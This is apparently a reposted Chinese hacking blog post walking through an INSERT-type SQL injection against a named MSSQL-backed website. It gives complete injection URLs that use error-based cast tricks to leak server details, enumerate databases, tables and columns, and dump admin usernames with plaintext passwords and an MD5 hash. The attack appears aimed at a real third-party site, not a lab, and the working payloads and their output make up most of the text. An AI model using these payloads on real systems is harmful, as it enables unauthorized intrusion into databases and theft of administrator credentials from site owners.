insert注入

群里有人在问insert型的怎么注射，insert类型的我还没碰到过呢，就去看了看，做了一下笔记备忘。
http://www.bbyoo.com/nanyin.aspx?ProID=49579′ 加一个点，报错

是insert类型的语句，百度了一下，对insert语句的注射大致有个了解，于是开始刺探信息。
提交：http://www.kunlun.com/nanyin.aspx?ProID=49579′,cast(@@version/**/as/**/int),null);–

不兼容…把int换成varchar，页面返回正常。。。百度一下，原来是mssql不允许将text或ntext型数据直接转换为int型
要想爆出信息看来得找个varchar 或nvarchar类型的字段，把后面2个对换了一下位置，成功爆出。
提交：http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,cast(system_user/**/as/**/int));–
在将 nvarchar 值 ‘AFDataLogin’ 转换成数据类型 int 时失败。
很好，再接着爆信息，收集的一些如下。
version：Microsoft SQL Server 2005 – 9.00.4035.00 (Intel X86)……Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
servername：SQL2005
host_name：IBM1
db_name：kunlun
user_name：dbo
可以看出 web与数据库分离，看来想差异备份或log备份是不行的了，只能爆后台帐号、密码进后台了。
先爆一下库，构造
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)–
修改第最后一个dbid的值，爆出13个库…
1：master
2：tempdb
3：model
4：msdb
5：kunlun_BBS
6：kunlun
7：New_AF
8：AF_Back
9：Console
10：Newkunlun
11：Newkunlun2
12：Oldkunlun
13：NewBBS
接下来爆表名
构造： http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=’u’/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=’u’))–
修改第二个top的值，从0递增上去。爆第六张表时很开心，马上去爆字段、密码。
1：AF_UserAccount
2：YX_Unit
3：AF_UnionCompany
4：YX_FlashXZ
5：AF_UserPointLogs
6：Buy_Admin
爆指定表Buy_Admin的字段
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)))–
爆出来了，一样是修改第二个top的值。
密码：af_APass
ID：af_ID
用户：af_AName
看到name和pass很开心啊，马上爆内容。
提交：
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)–
爆出来了，还是明文的，呵呵，找后台登录。
hjbadmin hjbmanager
yck’ yck
高兴早了，怎么也登录不了。唉，再爆表把，爆到第N张，看见YX_Manage，开心了，这回没错了，爆字段爆内容
YX_AdminUser YX_Pwd
hgnadmin 50252EC697150CC9AA69A47333C716B8
可惜啊，md5解密不出….到这里差不多就结束了。很晚了。
哦，忘了说了，这个是dbo权限，呵呵。
本文转自独自等待博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理.